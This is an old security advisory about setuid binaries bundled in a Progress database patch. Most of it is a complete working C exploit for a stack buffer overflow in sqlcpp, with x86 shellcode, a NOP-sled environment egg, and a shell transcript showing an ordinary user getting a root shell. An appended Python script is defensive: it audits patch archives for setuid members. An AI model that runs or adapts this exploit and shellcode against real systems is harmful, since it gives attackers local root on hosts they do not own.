
Progress database setuid binaries exploit
2nd Apr 2002 [SBWID-5228]
COMMAND

	Progress database setuid binaries exploit

SYSTEMS AFFECTED

	??

PROBLEM

	'KF' of Snosoft [http://www.snosoft.com] posted :

	Progress likes to include a lot of suids in  their  patches...  and  they
	GIVE them to you even if you don't use the  software.  sqlcpp  was  NOT
	part of my install until I patched my box. Thanks for the root  security
	hole guys and STOP using p_stcopy()!
	

	[root@localhost root]# tar tzvf 91C09.tar.Z  | grep ws
	-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
	-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
	-rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut
	-rwsrwxr-x patchbld/rdl  413694 2002-02-26 08:16:53 bin/_orasrv
	-rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv
	-rwsrwxr-x patchbld/rdl  268161 2002-02-26 08:16:57 bin/_probrkr
	-rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild
	-rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres
	-rwsrwxr-x patchbld/rdl  311275 2002-02-26 08:17:06 bin/_prooibk
	-rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv
	-rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil
	-rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil
	-rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx
	-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp

	

	Much thanks to "The Itch" and his great work.
	

	[dotslash@ghetto misc]$ id
	uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)
	[dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c
	[dotslash@ghetto misc]$ ./sqlcppx
	/usr/dlc/bin/sqlcpp
	Vulnerability found by KF / http://www.snosoft.com
	Coded by The Itch / http://www.promisc.org

	Using return address: 0xbffffae4
	Using buffersize    : 60
	sh-2.05# id
	uid=0(root) gid=501(dotslash) groups=501(dotslash)

	

	

	

	/*
	 * Yet another Progress Database exploit (version ??)
	 *
	 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
	 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
	 *
	 * This exploit was developed on the Snosoft vulnerability research machines
	 * mail dotslash@snosoft.com if you are interested in contributing research time
	 *
	 * - The Itch
	 * - itchie@promisc.org
	 *
	 * - Technical details concerning the exploit -
	 *
	 * 1). Buffer overflow occurs after writing more than 56 bytes into the buffer at the command line
	 *     (56 to overwrite ebp, 60 to overwrite eip).
	 * 2). If you write more than 65 bytes, other frames will be overwritten afterwards and will mess up
	 *     your flow of arbitrary code execution.
	 */

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>     /* strlen, memcpy */
	#include <unistd.h>     /* execl */

	#define DEFAULT_EGG_SIZE 2048
	#define NOP 0x90

	#define DEFAULT_BUFFER_SIZE 60

	char shellcode[] =
	        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
	        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

	int main(int argc, char *argv[])
	{
	        char *buff;
	        char *egg;
	        char *ptr;
	        long *addr_ptr;
	        long addr;
	        int bsize = DEFAULT_BUFFER_SIZE;
	        int eggsize = DEFAULT_EGG_SIZE;
	        int i;
	        /* address of a local variable, used as the guessed stack address (32-bit only) */
	        int get_sp = (int)&get_sp;

	        if(argc > 1) { bsize = atoi(argv[1]); }

	        if(!(buff = malloc(bsize)))
	        {
	                printf("unable to allocate memory for %d bytes\n", bsize);
	                exit(1);
	        }

	        if(!(egg = malloc(eggsize)))
	        {
	                printf("unable to allocate memory for %d bytes\n", eggsize);
	                exit(1);
	        }

	        printf("/usr/dlc/bin/sqlcpp\n");
	        printf("Vulnerability found by KF / http://www.snosoft.com\n");
	        printf("Coded by The Itch / http://www.promisc.org\n\n");
	        printf("Using return address: 0x%x\n", get_sp);
	        printf("Using buffersize    : %d\n", bsize);

	        /* fill the command-line argument with the return address */
	        ptr = buff;
	        addr_ptr = (long *) ptr;
	        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

	        /* build the environment "egg": NOP sled followed by the shellcode */
	        ptr = egg;
	        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
	        {
	                *(ptr++) = NOP;
	        }

	        for(i = 0; i < strlen(shellcode); i++)
	        {
	                *(ptr++) = shellcode[i];
	        }

	        egg[eggsize - 1] = '\0';
	        memcpy(egg, "EGG=", 4);
	        putenv(egg);

	        execl("/usr/dlc/sqlcpp", "sqlcpp", buff, (char *)NULL);

	        return 0;
	}
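	The check the `grep ws` listing above calls for, as an added example that is neither part of KF's post nor anything shipped by Progress: a Python audit that reports every setuid/setgid member of a patch archive before it is unpacked, and the mode to install such a member with when the bit is not justified. The archive it scans is constructed inline, with member names borrowed from the listing.

```python
"""Audit a vendor patch archive for setuid/setgid members before unpacking it."""
import io
import stat
import tarfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setid_members(tar_bytes):
    """Return (name, mode string, owner) for each regular file in the archive
    that carries the setuid or setgid bit; the mode string matches 'ls -l'."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf.getmembers():
            if m.isfile() and m.mode & SETID_BITS:
                # tarfile keeps only permission bits; add the file-type bit
                # so stat.filemode() renders the familiar "-rwsrwxr-x".
                mode_str = stat.filemode(stat.S_IFREG | m.mode)
                hits.append((m.name, mode_str, m.uname or str(m.uid)))
    return hits


def strip_setid_bits(mode):
    """Mode to install a member with when its setuid/setgid bit is not justified."""
    return mode & ~SETID_BITS


def build_sample_archive():
    """Constructed stand-in for the 91C09.tar.Z listing above (not the real
    patch): two setuid members and one ordinary file, owner patchbld/rdl."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, mode in (("bin/sqlcpp", 0o4775),
                           ("bin/_proutil", 0o4775),
                           ("bin/README", 0o644)):
            payload = b"placeholder\n"  # constructed file contents
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            info.mode = mode
            info.uname, info.gname = "patchbld", "rdl"
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    for name, mode_str, owner in find_setid_members(build_sample_archive()):
        print(f"{mode_str} {owner} {name}")
```

Run against a real patch by passing the archive bytes to `find_setid_members`; every hit is a binary to justify or install without its setuid bit.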

	

SOLUTION

	None yet.
